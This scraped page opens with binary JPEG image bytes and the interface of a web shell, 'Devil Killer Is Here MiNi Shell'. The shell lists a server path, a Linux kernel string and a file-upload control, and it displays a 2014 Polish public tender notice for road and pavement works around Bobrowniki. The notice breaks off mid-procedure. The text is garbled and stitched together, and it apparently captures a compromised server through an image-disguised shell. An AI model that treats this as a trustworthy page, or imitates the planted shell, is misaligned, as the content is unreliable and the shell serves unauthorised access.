JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140702/220576-N-2014.html

<p class="kh_header"><b>Rogoźnik: Przebudowa i remont dróg powiatowych na terenie Gminy Bobrowniki</b><br>
<b>Numer ogłoszenia: 220576 - 2014; data zamieszczenia: 02.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Będzinie z/s w Rogoźniku , ul. Węgroda 59, 42-582 Rogoźnik, woj. śląskie, tel. 032 2877519, 2877872, faks 032 2877885.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip-pzd.powiat.bedzin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i remont dróg powiatowych na terenie Gminy Bobrowniki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych w ramach zadania: Przebudowa i remont dróg powiatowych na terenie Gminy Bobrowniki (z podziałem na części). Zakres robót obejmuje:
Część I: Przebudowa nawierzchni jezdni i budowa chodnika w drodze powiatowej 4778 S - ul. M. Dąbrowskiej w Bobrownikach - etap II - Przedmiotem inwestycji jest remont odcinka nawierzchni jezdni z mieszanki mineralno-bitumicznej oraz budowa chodnika wraz ze zjazdami do posesji. Dla potrzeb odwodnienia pasa drogowego przewiduje się budowę kanalizacji deszczowej. Nowymi elementami zagospodarowania terenu jest chodnik wraz ze zjazdami na posesję na odcinku od istniejącej nowej nawierzchni (remont w 2013 r.) do zjazdu (włącznie) przy posesji nr 11. Zakres robót obejmuje:
a) wymianę konstrukcji jezdni na dł. 57,0 mb i pow. 361,95 m2,
b) budowę chodnika z kostki betonowej na pow. 104,22 m2,
c) budowę zjazdów z kształtek bet. gr. 8 cm na pow. 24,70 m2,
d) zabudowę krawężników betonowych na dł. 91,4 mb,
e) zabudowę obrzeży na dł. 58,3 mb,
f) budowa kanalizacji deszczowej fi 600 na dł. 57,0 mb,
g) zabudowa studni rewizyjnych - szt. 3,
h) niwelację i humusowanie poboczy na pow. 129,5 m2,
i) zabudowę wpustów ulicznych z przykanalikiem fi 200 - szt. 2,
j) demontaż istniejących i montaż nowych słupów linii napowietrznej energetycznej - szt. 2,
k) demontaż istniejącej i montaż nowej linii napowietrznej energetycznej - dł. 54 m.
Część II: Przebudowa drogi powiatowej 4768 S - budowa chodnika - ul. Gminna w Bobrownikach - budowa chodnika w pasie drogi powiatowej 4768 S - ul. Gminna w Bobrownikach - na odcinku od ul. Młyńskiej do drogi dojazdowej na jezioro oraz od mostu do istniejącego chodnika z kostki betonowej. Zakres robót obejmuje:
a) budowę chodnika z kostki betonowej gr. 8 cm koloru szarego na pow. 595,05 m2,
b) budowę zjazdów do posesji z kostki betonowej koloru szarego i częściowo czerwonego na
pow. 27,36 m2,
c) zabudowę obrzeży betonowych 20x6 cm - dł. 449,20 mb,
d) zabudowę krawężników betonowych najazdowych - dł. 10 mb,
e) plantowanie i humusowanie poboczy na pow. 220,0 m2.
Część III: Budowa chodnika przy drodze powiatowej 4755 S - ul. Kościuszki w Siemoni oraz ul. Wolności w Twardowicach - etap III:
Chodnik + kanalizacja deszczowa w ul. Kościuszki w Siemoni.
Przedmiotem zakresu robót jest w Siemoni jest budowa chodnika na odcinku od zjazdu przy posesji nr 8 do końca posesji nr 5 na dł. 65,3 mb .Na odcinku tym wybudowana zostanie również kanalizacja deszczowa na dł. 65,3 mb. Zakres robót obejmuje:
a) zabudowę krawężników betonowych wystających na ławie bet. na dł. 50,8 mb,
b) zabudowę krawężników betonowych najazdowych na ławie bet. na dł. 14,50 mb,
c) zabudowę obrzeży betonowych 30x8 cm na dł. 77,0 mb,
d) budowę konstrukcji i nawierzchni chodnika z kształtek betonowych gr. 8 cm na pow. 93,25 m2,
e) budowę konstrukcji i nawierzchni zjazdu do posesji z kształtek bet. gr. 8 cm na pow. 37,80 m2,
f) plantowanie + humusowanie poboczy na pow. 78,4 m2,
g) zabudowę rurociągu z PVC fi 315 dł. 65,3 mb,
h) zabudowę studni kanalizacyjnych systemowych fi 425 mm szt. 2.
Chodnik w ul. Wolności w Twardowicach.
Przedmiotem zakresu robót jest w Twardowicach jest budowa chodnika na odcinku od istniejącego chodnika do zjazdu (włącznie) przy posesji nr 14 na długości 147,2 mb. Zakres robót obejmuje:
a) zabudowę krawężników betonowych wystających na ławie bet. na dł. 133,2 mb,
b) zabudowę krawężników betonowych najazdowych na ławie bet. na dł. 14,0 mb,
c) zabudowę obrzeży betonowych 30x8 cm na dł. 135,16 mb,
d) budowę konstrukcji i nawierzchni chodnika z kształtek betonowych gr. 8 cm na pow. 199,13 m2,
e) budowę konstrukcji i nawierzchni zjazdu do posesji z kształtek bet.gr.8 cm na pow.30,50m2,
f) plantowanie poboczy na pow. 133,0 m.
Część IV: Budowa chodnika wraz z odwodnieniem przy drodze powiatowej 3201 S - ul. Wolności w Sączowie - etap III - budowa chodnika przy drodze powiatowej w Gminie Bobrowniki dla poprawy bezpieczeństwa ruchu pieszych. Nowymi elementami zagospodarowania terenu jest chodnik o szer. 1,5 m wraz ze zjazdami na posesję na odcinku od istniejącego chodnika na długości 80 mb. Zakres robót obejmuje:
a) zabudowę krawężników betonowych na dł. 80,0 mb,
b) zabudowę obrzeży betonowych na dł. 80,0 mb,
c) budowę chodnika i zjazdu z kształtek bet. gr. 8 cm szer. 1,5 m na pow. 120,0 m2,
d) niwelację i humusowanie poboczy na pow. 96,0 m2.
Część V: Przebudowa drogi powiatowej 4768 S - budowa chodnika - ul. Kościuszki w Dobieszowicach - remont chodnika na odcinku od zjazdu włącznie przy posesji nr 76 do zjazdu włącznie przy posesji nr 96 na długości 150,1 mb. Remont chodnika polegać będzie na wymianie konstrukcji i nowej nawierzchni chodnika i zjazdów po śladzie istniejącej nawierzchni chodnika i zjazdów. Zakres robót obejmuje:
a) zabudowę krawężników betonowych wystających na ławie bet. na dł. 89,75 mb,
b) zabudowę krawężników betonowych najazdowych na ławie bet. na dł. 74,82 mb,
c) zabudowę obrzeży betonowych 20x6 cm na dł. 52,0 mb,
d) budowę konstrukcji i nawierzchni chodnika z kształtek betonowych gr. 8 cm na pow. 113,70 m2,
e) budowę konstrukcji i nawierzchni zjazdu do posesji z kształtek bet. gr. 8 cm na pow. 96,07 m2.
Część VI: Przebudowa drogi powiatowej 4765 S - budowa chodnika - ul. Pocztowa w Sączowie - remont chodnika na odcinku od zjazdu przy budynku nr 2 do drogi za budynkiem nr 14 na długości 132,2 mb. Remont chodnika polegać będzie na wymianie konstrukcji i nowej nawierzchni chodnika i zjazdów po śladzie istniejącej nawierzchni chodnika i zjazdów.  Zakres robót obejmuje:
a) zabudowę krawężników betonowych wystających na ławie bet. na dł. 78,8 mb,
b) zabudowę krawężników betonowych najazdowych na ławie bet. na dł. 53,4 mb,
c) zabudowę obrzeży betonowych 20x6 cm na dł. 36,0 mb,
d) budowę konstrukcji i nawierzchni chodnika z kształtek betonowych gr. 8 cm na pow. 175,50 m2,
e) budowę konstrukcji i nawierzchni zjazdu do posesji z kształtek bet. gr. 8 cm na pow. 77,7 m2.
Część VII: Remont nawierzchni jezdni drogi powiatowej 4799 S - ul. Leśna w Myszkowicach - wykonanie na odcinku 500,0 mb naprawy istniejącej nawierzchni poprzez wyrównanie destruktem asfaltowym. Zakres robót obejmuje:
a) profilowanie i dogęszczenie istniejącej nawierzchni na pow. 1500 m2,
b) oczyszczenie i skropienie nawierzchni na pow. 1500 m2,
c) wykonanie nowej nawierzchni - w-wy gr. 7 cm z destruktu asfaltowego na pow. 1500 m2..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 Ustawy do 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.42-6, 45.23.31.61-5, 45.23.32.22-1, 45.23.11.10-9, 45.23.21.30-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: 
Część I: Przebudowa nawierzchni jezdni i budowa chodnika w drodze powiatowej 4778 S - ul. M. Dąbrowskiej w Bobrownikach - etap II - 4 500,00 PLN (słownie: cztery tysiące pięćset złotych 00/100 groszy)
Część II: Przebudowa drogi powiatowej 4768 S - budowa chodnika - ul. Gminna w Bobrownikach - 1 500,00 PLN (słownie: jeden tysiąc pięćset złotych 00/100 groszy)
Część III: Budowa chodnika przy drodze powiatowej 4755 S - ul. Kościuszki w Siemoni oraz ul. Wolności w Twardowicach - etap III - 3 000,00 PLN (słownie: trzy tysiące złotych 00/100 groszy)
Część IV: Budowa chodnika wraz z odwodnieniem przy drodze powiatowej 3201 S - ul. Wolności w Sączowie - etap III - 700,00 PLN (słownie: siedemset złotych 00/100 groszy)
Część V: Przebudowa drogi powiatowej 4768 S - budowa chodnika - ul. Kościuszki w Dobieszowicach - 900,00 PLN (słownie: dziewięćset złotych 00/100 groszy)
Część VI: Przebudowa drogi powiatowej 4765 S - budowa chodnika - ul. Pocztowa w Sączowie - 900,00 PLN (słownie: dziewięćset złotych 00/100 groszy)
Część VII: Remont nawierzchni jezdni drogi powiatowej 4799 S - ul. Leśna w Myszkowicach - 900,00 PLN (słownie: dziewięćset złotych 00/100 groszy)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał należycie, zgodnie ze sztuką budowlaną oraz prawidłowo ukończył co najmniej 3 roboty budowlane polegające na:
- część I - wykonaniu budowy, przebudowy lub remontu drogi, chodników i odwodnienia pasa drogowego - każda o wartości nie mniejszej niż 200 000,00 zł brutto,
- część II - wykonaniu budowy, przebudowy lub remontu chodników - każda o wartości nie mniejszej niż 100 000,00 zł brutto,
- część III - wykonaniu budowy, przebudowy lub remontu chodników i odwodnienia pasa drogowego - każda o wartości nie mniejszej niż 200 000,00 zł brutto,
- część IV, V, VI - wykonaniu budowy, przebudowy lub remontu chodników - każda o wartości nie mniejszej niż 40 000,00 zł brutto,
- część VII - wykonaniu budowy, przebudowy lub remontu drogi - każda o wartości nie mniejszej niż 40 000,00 zł brutto.
W celu oceny spełniania przez Wykonawcę warunku, o którym mowa powyżej, Wykonawca zobowiązany jest przedłożyć wraz z ofertą:
a)	wykaz robót budowlanych, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie -  z podaniem ich rodzaju i wartości, daty i miejsca wykonania - zgodnie z załącznikiem nr 4 do SIWZ,
b)	dowody dotyczące najważniejszych robót określające, czy roboty te zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Wystarczające będzie wskazanie w wykazie oraz załączenie dowodów dotyczących robót budowlanych w liczbie i zakresie niezbędnym do wykazania spełniania wyżej opisanego warunku wiedzy i doświadczenia.
Dowodami, o których wyżej mowa, są:
- poświadczenie,
- inne dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia.
W przypadku, gdy Zamawiający - Powiatowy Zarząd dróg w Będzinie z/s w Rogoźniku jest podmiotem, na rzecz którego roboty budowlane wskazane w załączniku Nr 4 do SIWZ zostały wcześniej wykonane, Wykonawca nie  ma obowiązku przedkładania dowodów, o których mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie (dysponuje lub będzie dysponował) odpowiednim potencjałem technicznym, tj. narzędziami, wyposażeniem zakładu i urządzeniami technicznymi w celu realizacji zamówienia - W celu oceny spełniania przez Wykonawcę warunku, o którym mowa powyżej, Wykonawca zobowiązany jest przedłożyć wraz z ofertą oświadczenie o spełnianiu warunku, zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie (dysponuje lub będzie dysponował) osobą/ami zdolną/ymi do wykonania zamówienia, tj.:
- część I i III:
- co najmniej 1 osobą posiadającą/ymi prawo do wykonywania samodzielnych funkcji technicznych w budownictwie, tj. uprawnienia budowlane w zakresie kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń,
- co najmniej 1 osobą posiadającą/ymi uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych
- część II, IV, V, VI i VII:
- co najmniej 1 osobą posiadającą/ymi prawo do wykonywania samodzielnych funkcji technicznych w budownictwie, tj. uprawnienia budowlane w zakresie kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń,
(lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów)
oraz zrzeszoną/ymi we właściwym samorządzie zawodowym, zgodnie z przepisami ustawy z dna 15.12.2000 r. o samorządach zawodowych architektów, inżynierów budowlanych oraz urbanistów (Dz. U. z 2013 r. poz. 932) 
lub
spełniającą/ymi warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2013 r. poz. 1409) tj. osobą/y, której/ych odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniającą/ymi wymogi, o których mowa w art. 20a ustawy z dnia 15.12. 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (świadczenie usług transgranicznych).
W celu oceny spełniania przez Wykonawcę warunku, o którym mowa powyżej, Wykonawca zobowiązany jest przedłożyć wraz z ofertą:
a) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia (wystarczające będzie wykazanie wyłącznie osób, o których mowa powyżej) wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnymi dla wykonywania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - zgodnie z załącznikiem nr 5 do SIWZ,
b) oświadczenie, że osoba/y, która/e będzie/ą uczestniczyć w wykonywaniu zamówienia, posiada/ją wymagane uprawnienia - zgodnie z załącznikiem nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełniania przez Wykonawcę warunku, o którym mowa powyżej, Wykonawca zobowiązany jest przedłożyć wraz z ofertą oświadczenie o spełnianiu warunku, zgodnie z załącznikiem nr 3 do SIWZ.
Jeżeli Wykonawca wykazuje spełnianie warunku, o którym mowa w pkt 2.4, polega na zasobach innych podmiotów, na zasadach określonych w art. 26 ust 2b ustawy, wymaga się przedłożenia dokumentów, o których mowa w pkt 2.4 rozdziału XI SIWZ, dotyczących tych podmiotów.
W celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w pkt 2.1 do 2.4 rozdz. XI SIWZ, oprócz dokumentów wyszczególnionych powyżej, należy złożyć oświadczenie, zgodnie z załącznikiem nr 3 do SIWZ.
W zakresie warunków udziału w postępowaniu opisanych w pkt 2.2 do 2.4 (opis sposobu dokonania oceny spełniania warunków) rozdziału XI SIWZ, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolności finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Zobowiązanie takie należy złożyć w oryginale lub kopii notarialnej lub kopii poświadczonej za zgodność z oryginałem przez podmiot udostępniający swoje zasoby.
Jeżeli Wykonawca, wykazując spełnianie warunków, opisanych w pkt 2.2 do 2.4 rozdziału XI SIWZ, polega na zasobach innych podmiotów na zasadach określonych powyżej (zgodnie z art. 26 ust. 2b Ustawy), Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać dokumentów dotyczących w szczególności:
a) zakresu dostępnych Wykonawcy zasobów innego podmiotu,
b) sposobów wykorzystania zasobów innego podmiotu przez Wykonawcę przy wykonywaniu zamówienia,
c) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 Ustawy, a opisanych w punktach 2.2 do 2.4 rozdziału XI SIWZ (opis sposobu dokonania oceny spełniania warunków), polega na zasobach innych podmiotów na zasadach określonych powyżej (zgodnie z art. 26 ust. 2b Ustawy), a podmioty te będą brały udział w realizacji zamówienia, wymagane jest przedłożenie w odniesieniu do tych podmiotów dokumentów, o których mowa w punkcie 1 (od 1.1 do 1.2) rozdziału XI SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy, kosztorysy ofertowe, pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego, dowód wniesienia wadium, lista podmiotów należących do tej samej grupy kapitałowej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
